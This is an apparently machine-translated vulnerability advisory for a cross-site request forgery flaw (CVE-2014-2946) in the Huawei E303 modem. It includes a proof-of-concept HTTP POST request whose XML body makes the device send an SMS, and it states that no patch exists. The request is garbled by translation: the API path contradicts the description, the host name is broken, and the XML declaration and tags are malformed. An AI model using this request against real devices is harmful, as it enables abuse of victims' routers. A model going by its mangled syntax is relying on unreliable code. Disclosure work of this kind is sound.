Huawei E303 router Cross-Site Request Forgery Vulnerability

Release date:
Updated on: 2014-06-03

Affected Systems:
Huawei E303
Description:
--------------------------------------------------------------------------------
Bugtraq id: 67747
CVE (CAN) ID: CVE-2014-2946
 
The Huawei E303 router is a wireless broadband modem.
 
Huawei E303 Router (firmware version CH2E303SM) has a Cross-Site Request Forgery Attack on/api/sms/send-sms URL implementation. Remote attackers use the request element in the XML document, attackers can exploit this vulnerability to hijack administrator authentication requests.
 
<* Source: Benjamin Daniel Mussler

Link: http://www.kb.cert.org/vuls/id/325636
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
[Proof-of-concept http post request]:
POST/api/sms/send-text message http/1.1
Host: hi. link
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 25.0) Gecko/20100101 Firefox/25.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: en-us, en; q = 0.8, de-de; q = 0.5, de; q = 0.3
Accept-Encoding: gzip, deflate
Referer: http://hi.link/
Connection: keep-alive
Content-Type: text/plain
Content-Length: 225
 
<? Xml version = "1.0"
Encoding = "UTF-8"?> <Request> <Index>-1 </Index> <Phones> <Phone> 4422 </Phone> </Phones> <Sca> </Sca> <Content>
Sample Text </Content> <Length> 0 </Length> <Reserved> 1 </Reserved> <Date> 2013-12-03
16:00:00 </Date> </request>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Huawei
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://support.huawei.com/enterprise/

This article permanently updates the link address: